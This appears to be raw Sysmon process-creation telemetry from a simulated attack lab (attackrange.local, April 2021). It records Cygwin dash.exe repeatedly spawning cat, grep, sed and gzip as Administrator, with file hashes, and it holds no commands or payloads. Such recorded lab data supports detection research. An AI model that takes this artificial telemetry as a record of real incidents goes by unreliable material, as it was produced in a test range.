14:55:56.595{A8622C2F-53FC-6078-D009-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.586{A8622C2F-53FC-6078-CF09-00000000AE01}3200C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-CD09-00000000AE01}6852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050632Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.579{A8622C2F-53FC-6078-CE09-00000000AE01}5396C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-CB09-00000000AE01}924C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050630Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.579{A8622C2F-53FC-6078-CD09-00000000AE01}6852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050611Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.572{A8622C2F-53FC-6078-CC09-00000000AE01}2664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-CA09-00000000AE01}1612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.572{A8622C2F-53FC-6078-CB09-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050598Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.565{A8622C2F-53FC-6078-CA09-00000000AE01}1612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050586Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.557{A8622C2F-53FC-6078-C909-00000000AE01}2112C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-C809-00000000AE01}6416C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.550{A8622C2F-53FC-6078-C809-00000000AE01}6416C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050564Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.542{A8622C2F-53FC-6078-C709-00000000AE01}612C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-C509-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050546Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.535{A8622C2F-53FC-6078-C609-00000000AE01}4288C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-C309-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.534{A8622C2F-53FC-6078-C509-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.527{A8622C2F-53FC-6078-C409-00000000AE01}3136C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-C209-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050524Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.527{A8622C2F-53FC-6078-C309-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.520{A8622C2F-53FC-6078-C209-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050500Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.513{A8622C2F-53FC-6078-C109-00000000AE01}616C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-C009-00000000AE01}6364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050490Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.506{A8622C2F-53FC-6078-C009-00000000AE01}6364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.497{A8622C2F-53FC-6078-BF09-00000000AE01}2952C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-BD09-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.490{A8622C2F-53FC-6078-BE09-00000000AE01}6652C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-BB09-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050458Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.489{A8622C2F-53FC-6078-BD09-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050439Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.483{A8622C2F-53FC-6078-BC09-00000000AE01}3200C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-BA09-00000000AE01}4056C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.482{A8622C2F-53FC-6078-BB09-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.476{A8622C2F-53FC-6078-BA09-00000000AE01}4056C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050414Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.468{A8622C2F-53FC-6078-B909-00000000AE01}5516C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-B809-00000000AE01}6580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.461{A8622C2F-53FC-6078-B809-00000000AE01}6580C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.452{A8622C2F-53FC-6078-B709-00000000AE01}7016C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-B509-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.445{A8622C2F-53FC-6078-B609-00000000AE01}2112C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-B309-00000000AE01}4300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050371Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.445{A8622C2F-53FC-6078-B509-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050352Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.438{A8622C2F-53FC-6078-B409-00000000AE01}612C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-B209-00000000AE01}5628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.438{A8622C2F-53FC-6078-B309-00000000AE01}4300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.431{A8622C2F-53FC-6078-B209-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.423{A8622C2F-53FC-6078-B109-00000000AE01}1392C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-B009-00000000AE01}5116C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.416{A8622C2F-53FC-6078-B009-00000000AE01}5116C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.408{A8622C2F-53FC-6078-AF09-00000000AE01}6968C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-AD09-00000000AE01}5852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050287Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.400{A8622C2F-53FC-6078-AE09-00000000AE01}616C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-AB09-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.400{A8622C2F-53FC-6078-AD09-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050266Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.393{A8622C2F-53FC-6078-AC09-00000000AE01}2952C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-AA09-00000000AE01}6448C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050265Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.393{A8622C2F-53FC-6078-AB09-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050253Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.386{A8622C2F-53FC-6078-AA09-00000000AE01}6448C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050241Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.378{A8622C2F-53FC-6078-A909-00000000AE01}1156C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-A809-00000000AE01}6592C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.371{A8622C2F-53FC-6078-A809-00000000AE01}6592C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050219Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.363{A8622C2F-53FC-6078-A709-00000000AE01}5396C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-A509-00000000AE01}4056C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050201Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 